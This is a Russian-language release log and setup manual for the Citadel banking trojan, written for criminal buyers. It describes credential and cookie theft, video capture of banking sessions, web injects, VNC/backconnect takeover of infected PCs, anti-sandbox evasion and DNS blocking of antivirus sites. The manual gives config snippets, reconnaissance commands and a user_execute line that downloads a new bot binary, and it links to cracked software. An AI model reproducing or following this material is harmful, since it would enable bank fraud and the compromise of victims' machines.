[+] Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.
[+] Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
[+] Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.
[+] Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом.
[+] Реализована совместимость инжектов с UTF-8 (теперь в инжекты можно вставлять любые языки, такие как японский, китайский и т.д)
[+] Разработана крипт-панель в админке Citadel. Это раздел в админке, который позволяет вам обновлять ехе-файл ботам, прямо из веба. В любой момент, вы можете перезакачать нужный ехе-файл и боты его своевременно скачают. Ведется история загрузок в формате: Файл | Дата Загрузки | Оплачено(Y/N)
По поводу последнего пункта, мы разделили полномочия и создали отдельную категорию пользователей с правами "криптера" - эти пользователи имеют доступ к вашей панели по вашему желанию и единственная привилегия этих пользователей - возможность обновлять ехе-файл, при этом вы можете отмечать в таблице, оплачен конкретный крипт или нет.
Можно включить jabber-уведомления по результату проверки на scan4you.
[+] Добавленны полноэкранные скриншоты (Опция в конфиге - "@@").
[+] Улучшен механизм автоапдейтинга: если вы столкнулись с проблемой большой нагрузки на сервере при обновлении(либо боты не переходят на новую админку), то этот фикс исправляет эту ситуацию. Фикс включает в себя:
- Старые репорты от прошлой версии ехе удаляются при обновлении (tmp файл), дополнительная подстраховка.
- Тяжелые отчеты (видео и прочее файловые репорты) дополнительно проверяются на корректность и удаляются в случае проблем(например, если такой файл уже закачан)
- Изменено время инициализации апдейтинга, в результате чего исклчючен deadloc и не возможность дальнейшего апдейта при какой-либо ошибке файловой системы.
[+] Исправили проблему мусорных логов в админке: убрали полное логирование Flash-роликов (swf/flv) из логов и всего Facebook, потому что огромное количество мусора идет именно от них.
[+] Модуль "Качественная проверка WebSocks" теперь встроен в админку, никаких лишних скриптов. Показывает: страну, штат, город, хостнейм, аптайм и ping lag.
Возможность входа в этот раздел без пароля, для удобства когда нужен срочно сокс smile.gif
[+] Модуль "Парсер логов" теперь встроен в админку, никаких лишних скриптов. Интерфейс значительно улучшен, добавлена возможность создания "избранных доменов", "архивных логов" и возможность парсинга https или http доменов на выбор. Выстраивается визуальная таблица всех доменов, которые фигурируют в логах.
[+] Добавлен раздел "Заметки" в админку Citadel, что-то вроде онлайн блокнота. Адаптировали интерфейс админки для планшетов iPad/Galaxy Tab.
[+] Доработали модуль "VNC-админка", теперь он встроен напрямую в админку Citadel, никаких дополнительных скриптов. Все устанавливается 1 кликом. Много новых возможностей, а именно:
- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.
- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.
- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.
- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.
- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.
- Возможность любых уведомлений в несколько Jabber'ов сразу.
[+] Исправлена проблема цепочки хуков в Chrome.
[+] При запуске user_execute с флагом "-f" принудительно переводится в режим только апдейтинга ехе и не будет запущен как инсталятор.
[+] Оптимизирована работа гейта, что позволило снизить нагрузку. Упрощена работа инсталлятора админки, что позволяет установить все модули в 1 клик.
[+] Добавлена поддержка новой версии Chrome 18 [инжекты/формграббинг]
[+] Добавлена кнопка "Все отчеты бота" в админке, позволяет просмотреть начало и конец отчетов от конкретного бота.
[+] Исправлен баг с ручной командой dns_filter_add, теперь блокировка URL'ов работает корректно.
[+] Исправлен баг с отображением ехе-файлов на главной странице, удаленные ехе теперь исчезают автоматически.
[+] Исправлен баг с работой планировщика заданий scan4you, ежедневная проверка ехе-файлов работает корректно.
[+] Добавлена единая система CRON-работы, одно cron-задание управляет теперь всеми задачами: jabber-уведомления, проверка файлов, работа модулей и т.п.
[+] Добавлена возможность удаления видео из админки.
[+] Добавлена отсылка примечания к боту в Jabber в VNC-модуле.
[+] Обновлена GeoIP база (конец 2011 года).
[+] Последний домен из AdvancedConfigs срабатывает с задержкой, сделано с целью защиты ваших резервных URL'ов от автоматического граббинга ханипотами.
[+] Исправлена работа скрипта архивирования данных в zip в админке (fsarc.php)
[+] Настройки Jabber-аккаунта и всех параметров теперь вынесены в общие настройки.
[+] Теперь можно указывать пути в конфиге с httpS:// (неподписанные сертификаты проходят)
[+] Исправлен баг с регистрозависимостью в инжектах, теперь <BODY> и <body> одинаковые сущности. Все инжекты регистронезависимые.
[+] Полностью измененый интерфейс веб-админки, user-friendly.
[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "Cookies" в контекстное меню по ботам, которая позволяет оперативно вывести все Cookies бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция вынесена в конфиг. antiemulation_enable 0/1
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию.
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в Header'ах, т.к она может мешать некоторым инжектам в работе.
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m)
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.
[+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
[+] Возможность добавить бота в "Избранное" без отчетов.
[+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте - Флаги"
[+] Сортировка скриншотов по дате.
[+] Добавлена возможность подключения других БД Citadel (как удаленные, так и старые/отключенные админки) для поиска отчетов.
[+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
[+] Расширен Jabber уведомитель, добавлены следущие события:
- Маски BotID на событие "Бот вышел в Online"
- Уведомление при обнаружении конкретного ПО из "installed software"
- Маска на содержимое CMD отчета.
- Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
[+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
[+] Исправлена ошибка удаления отчетов.
[+] Авто-обновление статистики главной страницы.
[+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
[+] Добавлена возможность определения online/offline статуса у бота в API.
[+] Полностью переделан алгоритм проверки в модуле WebSocks.
[+] Отображение скриптов(команд) постранично.
[+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
[+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки:
[+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
[+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
[+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
[+] Plaintext логи открываются в новой вкладке.
[+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
[+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
[+] Возможность указать в DnsFilters маски со звездочками (*), сделать маску более гибкой.
[+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Все работает через админку.
Краткий ликбез:
В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
Сушествует несколько режимов для паков.
Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
[+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
[+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1).
----------------------------------------------------------------------------
ДЛЯ УПРОЩЕНИЯ ПОНИМАНИЯ ИНФОРМАЦИИ, ВЫ МОЖЕТЕ ПРОПУСТИТЬ РАЗДЕЛЫ,
ГДЕ ОПИСАНА УСТАНОВКА И ИСПОЛЬЗОВАНИИ МОДУЛЕЙ, КОТОРЫЕ ВЫ НЕ ПРИОБРЕТАЛИ
ИСПОЛЬЗУЙТЕ CTRL+F ДЛЯ ПОИСКА КЛЮЧЕВЫХ СЛОВ И ОПРЕДЕЛЕНИЙ.
----------------------------------------------------------------------------
********************************************************************************
==========================>>>>> 2. Доступ в CRM и ее описание
********************************************************************************
Данные аккаунта выдаются персонально в Jabber.
Что такое Citadel CRM Store?
Это система взаимодействия между нашими клиентами и разработчиком.
Наверное, вам знакома ситуация, когда саппорт продукта игнорит ваши запросы в icq/jabber'e - этому способствует высокая нагруженность человека, который отвечает за все это, потому что клиентов много, а он один, да еще и занят делами.
Специально для вас была разработана система, благодаря которой, вы можете незамедлительно сообщить о баге в софте, а мы в свою очередь его пофиксим, если таковой имеется. Все запросы поступают нескольким людям одновременно, с уведомлениями по jabber/sms. Вы довольно быстро получите ответ внутри тикет-системы.
У вас возникла замечательная идея для доработки софта и вы хотите ею поделиться с разработчиком (пусть это даже самая маленькая идея: к примеру, вам не нравится формат логов) - мы идем вам навстречу.
Вы можете создать 2 вида заявок(читайте-проектов) внутри CRM:
а) публичная заявка - это заявка с темой + описанием(лучше прикладывать ТЗ), которую будут видеть все клиенты, они могут ее обсудить в комментариях, предложить свою цену за реализацию и голосовать: нужна ли эта заявка или отправляем ее в треш.
Вы можете создавать данные виды заявок, а можете голосовать и делать любые действия относительно других заявок клиентов.
б) приватная заявка - если вы хотите предложить нашим разработчикам индвидуальную задачу и хорошую цену за реализацию, то этот вид заявки для вас. Его может видеть только разработчики(т.е мы) и вы. Если все условия устраивают обе стороны, данный модуль получаете только вы.
Все актуальные заявки, вы можете видеть в разделе "На обсуждении"

Право голоса имеет 4 значения:
- Нужен, я приобретаю
- Полезен, но мне не нужен
- Абсолютно не нужен
- Не нужен, я не приобретаю
Если вы увидели новую заявку - проголосуйте за нее, даже если она вам вообще не нужна! У нас очень узкий круг, поэтому именно ВАШЕ мнение является решаюшим для ВСЕХ, не оставайтесь в стороне.
О любых событиях внутри CRM(решения, заявки, комментарии) вы будете уведомлены ботом по jabber-каналу. Это сделано для вашего удобства, чтобы вам не рефрешить каждый раз страницу. Но все равно, необходимо заходить в СРМ чтобы следить за новостиями и заявками и проявлять свое мнение.
Чем быстрее идут голоса и мнения - тем оперативнее развивается продукт.
Если заявка набирает много отказных голосов, она идет в раздел "Отклоненные заявки" и закрывается.
Если заявка одобряется разработчиками, она идет в раздел "В разработке" и мы оцениваем примерные сроки ее реализации.
Не забудьте указать желаемую объявленную цену на модуль, за которую вы бы оценили доработку.
Все новости мы публикуем в разделе "Новости", если вам не приходят уведомления в Jabber, пожалуйста, немедленно сообщите об этом в саппорт т.к вы лишаете себя очень многого!
Заходите в СРМ почаще и проверяйте новости и комментарии к заявкам.
2) Список полезных ссылок, которые помогут вам:
1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:
http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe
2) Образ англоязычной Windows XP SP3 (Corporate Edition):
http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso
Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG
3) Комплект разработчика для создания инжектов + примеры (автор неизвестен, взято с форумов):
http://www.citadelmovement.com/software/injects_development.zip


********************************************************************************
==========================>>>>> 3. Step-By-Step установка Citadel
********************************************************************************
Установка Citadel
Папки:
builder - комплект билдера
backconnect - софт для BackConnect VNC модуля, а именно php скрипты для Backconnect Windows сервера (об этом ниже).
webserver(Либо server[php]) - админка и комплект скриптов для закачивания на сервер.
webserver/cp.php - файл управления админкой
webserver/gate.php - основной гейт для общения с ботом
webserver/file.php - скрипт выдачи конфигов и ехе файлов боту.
********************
>>>>>>>>>> а) Требования к серверу.
********************
PHP >5.3, Mysql 5 (желательно последняя версия, но на 5.2 тоже работает) Обязательно с модулем curl для PHP
cron, apache. По желанию nginx и панель управления cPanel или DirectAdmin.
+ Windows VPS если приобретали VNC админку (о самом модуле чуть ниже), Windows2008/2003/7 + 512 оперативной памяти и 2 гб места на диске. Процессор не ниже 1024 mhz

********************
>>>>>>>>>> б) Шаг 1 [Билдер, права, скрипты]
********************
При запуске builder.exe, будет строчка
Ключ авторизации: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Это ваш индвидуальный ключ для защиты от трекеров (мы его называем еще LOGIN KEY)
Его нужно поместить в файл webserver/system/global.php, в котором содержится строчка
define('BO_LOGIN_KEY', 'PUT_KEY_HERE');
Вставляем этот ключ сюда, т.е получается
define('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
По умолчанию данный ключ будет уже вписан в админку, поэтому, вам остается только проверить его.
Заливаем скрипты из папки webserver на сервер и расставляем права по схеме ниже:
Потом ставим chmod 777 на папку:
system
system/data
system/cron
files/
files/webinjects
Также, необходимо поставить перед установкой chmod 777 на всю папку webserver, после полной установки - вернуть права папки на chmod 755
После этих проделанных действий, открываем файлик webserver/api.php
и меняем строчку define('API_TOKEN_KEY', 'JHGuw3e76&^%&$gf232ghfgh%^$%^$%');
на любой произвольный пароль, к примеру define('API_TOKEN_KEY', 'dgwd23gwegw');
Это нужно чтоб вы были защищены от взлома и вас не скомпрометировали через скрипт API, поменяйте дефлотовый пароль.
Также, в целях безопасности, имеет смысл переименовать скрипт cp.php (это файл управления админкой) и gate.php (гейт)
Файл file.php переименовывать нельзя!
********************
>>>>>>>>>> в) Шаг 2 [Дополнительная защита админки]
********************
Заходим на http://www.htaccesstools.com/htpasswd-generator/
Вводим желаемое имя-пароль, выдается строчка типа a:$apr1$HE/llFvK$u3YAEGm277SkotywpTl9w/
Сохраняем эту строчку в файл .htpasswd в директории webserver
После чего создаем новый файл .htaccess в директории webserver
Туда пишем:
<Files cp.php>
AuthName "Your ID"
AuthType Basic
AuthUserFile /put/do/faila/.htpasswd
require valid-user
</Files>
Где /put/do/faila/.htpasswd - заменяем на свой конечный unix-путь.
Теперь при заходе на админку cp.php, будет дополнительная защита по паре логин-пароль.
Можно сделать по-другому и не создавать .htpasswd, а просто создать файл .htaccess и вписать туда строчки:
<Files cp.php>
Order Deny,Allow
Deny from all
Allow from 111.111.106.111
</Files>
Где 111.111.106.111 - ваш постоянный IP, теперь админка будет доступна только с вашего IP.
Какой из способов вам удобнее - выбирать вам.
********************
>>>>>>>>>> г) Шаг 3 [Разбор конфига]
********************
Откроем файл config.txt и рассмотрим НОВЫЕ настройки, старые настройки унаследованные от зевса остались неизменными, поэтому не будем заострять на них внимание. Если вы не пользовались зевсом, качайте паблик-релизы зевса и изучайте настройки самостоятельно. Продукт уже расчитан на то, что вы пользовались ранее Zeus'ом.
entry "Video"
quality 1
length 60
end
Секция для настроек видеограббера: length длина каждого видео в секундах, рекомендуется указывать не более 10 минут (600 секунд) т.к образуются весьма увесистые файлы.
Quality - от 1 до 5, качество видео. Рекомендуется оставить 1 по умолчанию, чтобы сэкономить на размере видео файлов.
Видео запись срабатывает при заходе на нужный нам линк и снимается ровно length-секунд.
Чтобы задать нужные нам маски для съемки, переходим в раздел entry "WebFilters"
"#*paypal.com/*"

символ # перед маской является символом активацией съемки.

Секция очень тонкая, потому что довольно сильно нагружает сервер файлами, указывайте как можно точную маску и только на очень нужные вам ссылки(к примеру банк.акки)
Рекомендуется настроить сервер apache & php - для приема файлов более 50 MB через POST.
Руководство по настройке сервера лежит здесь# http://jdownloads.ru/faq/8-how-uploadbigfiles.html
Тестируйте внимательно съемку видео НЕ на виртуальних машинах, т.к в связи с отсутствием нужных кодеков, может быть такое, что на виртуалках не будет сниматься видео.
Видео складываются в формате .webm, в папку _reports/*BOTNAME*/videos/
Их можно найти через поиск файлов в админке, либо просмотреть через онлайн плеер (раздел "Просмотр Видео"). Рекомендуется просматривать в браузере Opera и Firefox, остальные браузеры не тестировались.
entry "CmdList"
"hostname"
"net view"
"ipconfig /all"
end

Список системных команд, который бот исполнит при первом запуске на системе и пошлет в админку.
В админке, можно найти результат команд как тип отчета "Результат CMD-команды"
С ним будет список: бот - результат выполнения команды
в удобном формате (Раздел CMD-Парсер)
encryption_key "key"
Обязательно здесь задаем свой произвольный ключ, это RC4 ключ он же Encryption Key - вы его задаете при установке админки в инсталлере, поменять его можно в разделе Параметры. Он должен быть не слишком сложный и не слишком простой, совпадать в конфиге и в админке. НЕ РЕКОМЕНДУЕТСЯ СТАВИТЬ БОЛЕЕ 10 СИМВОЛОВ! ИСПОЛЬЗОВАТЬ ТОЛЬКОНИЖНИЙ РЕГИСТР И БЕЗ СПЕЦСИМВОЛОВ!

entry "DnsFilters"
"microsoft.com=127.0.0.1"
"myspace.com=127.0.0.1"
"gruposantander.es=127.0.0.1"
end
Возможность создать DNS-редирект или заблокировать AV-сервер или нежелательный урл(например, если вы обнаружили, что в логах загрузки идут еще кому-то и нужно заблокировать чей-то гейт).
Указывается IP-адрес для редиректа.
ДНС Редирект работает не только для браузеров, а для всего софта, который будет стучаться на данный домен. Все эти запросы будут перенаправлены на другой IP.
Маску можно задавать точную, либо использовать звездочки (*) для обозначения примерной маски, например:
entry "DnsFilters"
*bitdefender.com*=209.85.229.104
*download.bitdefender.com*=209.85.229.104
end
После того, как вы отредактировали конфиг под свои параметры, нажмите кнопу собрать конфиг, собрать бота и создать модули.
Кнопка собрать бота отвечает за генерацию ехе-файла и считывает параметры из секции StaticConfig
Кнопка собрать конфиг отвечает за генерацию файла с инжектами, а также секцию DynamicConfig.
Кнопка собрать модули создает файл видео.модуля и файл модуля граббинга кукисов Firefox.
Такие модули как: MiniAv,Cardswipe встроены в ехе-файл и не создают каких-либо дополнительных файлов.
Все полученые файлы необходимо закачать в директорию webserver/files
Не забудьте закриптовать ехе-файл перед тем как поместить его в папку, иначе будет такое, что по таймеру автообновления, боты начнут скачивать ехе, который палится.
Видео.модуль закачивать обязательно, даже если вы им не пользуетесь. Также, вы можете не закачивать ехе-файл если не хотите автообновления exe через параметр timer_autoupdate.
url_config1 "http://localhost/file.php|file=test_config.bin"
Указываем здесь test_config.bin - название нашего конфига, который мы залили в папку files/ с учетом того, что указываем также путь до file.php (а лежит он выше папки files). Символ | вас не должен смущать, он тут специально.
Расширение конфига может быть любое.

url_config1 указывать обязательно, можно также вписать несколько резервных конфиг-урлов на случай если какой-то из цепи доменов, в момент запуска ехе не работает, т.к боты не отстучаться в вашу админку, если не смогут скачать основной конфиг.
В этом случае пишем еще одну строчку под url_config1:

url_config2 "http://localhost/file.php|file=test_config.bin"
Указывать не обязательно. Но таких можно указывать до 3 резервных конфигов, бот поочередно будет стучаться на каждый из урлов пока не установит себе конфиг-файл. На самый последний url_config бот стучит с задержкой, через 5 часов, это сделано для защиты от автоматического парсинга урлов реверсерами.
Обратите внимание, что задача этих параметр не резервность, а подстраховка, на случай если в момент ПЕРВОГО запуска ехе билда, какой-то из трех доменов недоступен. Для резервности существует отдельная секция ниже "AdvancedConfigs"


url_loader "http://localhost/file.php|file=test_bot.exe"
test_bot.exe - здесь указываем название ехе-файла, который лежит в папке files/
Файл file.php не переименовываем, оставляем с таким же именем. Указываем путь дo file.php.

url_server "http://localhost/gate.php"
Здесь указываем путь до гейта - gate.php
Остальное настраивается как зевс, если забыли формат, читайте мануал от зевса zeus_old.txt

После того, как мы закачали файлы в files и залили всю папку в целом webserver + создали БД.
Идем по адресу: http://www.vash-host.com/webserver/install
Название папки webserver можно переименовывать на произвольное.
И вписываем все значения (БД, пароли, RC4 ключ) после чего удаляем каталог install.



********************************************************************************
==========================>>>>> 4. Установка BackConnect Windows сервера (VNC модуль)
********************************************************************************
Для установки серверной части, нужен Windows VPS/Dedicated желательно XP,2003,2008
Ставим веб-сервер XAMPP/WAMP/Apache c поддержкой PHP. Отключаем UAC+Windows Firewall, чтобы можно было открывать порты. А также отключим политику доменов и выйдем полностью из любого домена.
Заливаем в веб-директорию комплект скриптов backconnect\winserv_php_gate
Веб-админка коннектора будет по адресу: http://ip-serv/control.html
В ней будет лог по VNC/Backconnect Socks коннектам.
Возможные проблемы: из-за Windows фаерволла, проверьте этот момент очень внимательно. Не забудьте перезагрузить Windows после отключения фаерволла.
Все скрипты должны лежать в корне на сервере, никаких папок не создавать.
Если не знаете как поставить Apache с PHP, вот мануал: http://www.ripecms.com/documentation/articles/installing-apache-php
********************************************************************************
==========================>>>>> 5. Установка Citadel VNC Admin Interface
********************************************************************************
Если вы приобрели модуль VNC-админки, то в вашей панели будет доступен раздел "VNC".
Пробежимся по опциям, с которыми могут возникнуть трудности.
Для начала работы нужно нажать "Конфигурация" и вписать туда IP-адрес Windows-сервера, куда вы уже залили скрипты backconnect'a. Никаких путей не надо, просто IP-адрес.
Чем отличается коннект от автоконнект?
Если вы задаете коннект какому-то боту, то он разово выполнит эту команду и вышлет вам данные для подключения. Если вы задаете автоконнект, то бот будет инициировать соединение с backconnect-сервером каждый раз, как только он выходит в интернет. Опция применима как к Backconnect Socks, так и к VNC.
Теперь зададим URL-маски, которые мы будем отлавливать в нашу VNC админку, если есть в этом потребность.
Маска URL: здесь указываем URL по схеме *mail.ru* или http://*.bank.com* (можно играться как угодно, звездочка вам в помощь)
Параметры: Здесь указываем названия POST-переменных, которые находятся на форме сайта, который мы ловим. На примере mail.ru, это будет Login* и Password*
Формат параметров простой, можно указать "login=", можно указать "login*", или просто "login". Поэтому выбирайте как вам удобнее, не забудьте протестировать маску.
Параметры не чувствительны к регистру.
Уведомлять в Jabber?: ставим опцию, если хотим чтобы каждый новый отловленный акк, приходил вам. Jabber задается в настройках, можно указать несколько через запятую.
ВАЖНО! Чтобы в разделе "Параметры" были вписаны данные Jabber-бота(Использовать исключительно Jabber.org или Jabber.ru), с которого все это будет идти к вам.
Также, есть возможность создания Автоконнекта с ботом, от которого пришел новый аккаунт в раздел. Т.е в жабер вам сразу приходит аккаунт + порт для коннекта на VNC/SOCKS.
Не забывайте, что работает контекстное меню напротив ботов, линков и т.п через правую кнопку мыши: можно удалить какие-то ненужные акки(отправить в мусор), пометить как Избранное или включить/отключить нужные настройки.
Пример таблицы статистики:
2 ботов, 6 аккаунтов, 5 живых аккаунтов (83%) расчитывает % живых аккаунтов по принципу если бот не появлялся в сети более 4 дней, аккаунт считается мертвым.
Также, существует API для быстрого создания VNC/SOCKS соединения с нужным ботом, например во время перехвата токена или смс, вам нужно срочно зайти на акк под холдером, вы инжектом через javascript/iframe вызываете URL до api.php
* VNCController
* api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=VNC
* api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=SOCKS
* api.php/<token>/vnc/connect?botId=WIN-ABC123&protocol=VNC
*/
define('API_TOKEN_KEY', 'changethispassword');
И передаете IP или BotID, скрипт дает команду на установку соединения боту и данные приходят вам в жаббер. Тайминг зависит от параметра timer_stats в конфиге билдера.
Вот вам совет по работе с ботами на Win7/Vista: используйте Firefox portable для Win7/Vista - он работает корректно. Не забываем отключать wallpaper чтобы не гонять много трафика. Также, чтобы попасть в одну из директорий - нажимаем свойства ярлыка.
